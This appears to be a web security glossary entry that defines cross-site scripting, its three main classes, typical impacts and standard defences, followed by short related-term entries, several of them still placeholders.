Attacks & Threats
Cross-Site Scripting (XSS)
Also known as: XSS
Definition
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
Cross-Site Scripting (XSS) occurs when a web application includes untrusted input in its responses without proper escaping or sanitization, allowing attacker-controlled JavaScript to run in the victim's browser. The three main classes are reflected XSS (payload sent in a request and echoed back), stored XSS (payload persisted server-side, e.g. in comments), and DOM-based XSS (vulnerability lives in client-side code). Successful XSS can hijack sessions, steal tokens, deface pages, deliver malware, or pivot through SSRF and CSRF. Defences include context-aware output encoding, strict Content-Security-Policy, framework templating, HTTPOnly and SameSite cookies, and input validation.
Examples
- A stored XSS payload in a forum post steals session cookies from every reader that views the thread.
- A reflected XSS in a search parameter executes JavaScript supplied by an attacker via a crafted link.
Related terms
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
Content Security Policy (CSP)
Content Security Policy (CSP) — definition coming soon.
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.
Input Validation
Input Validation — definition coming soon.
Output Encoding
Output Encoding — definition coming soon.
OWASP Top 10
OWASP Top 10 — definition coming soon.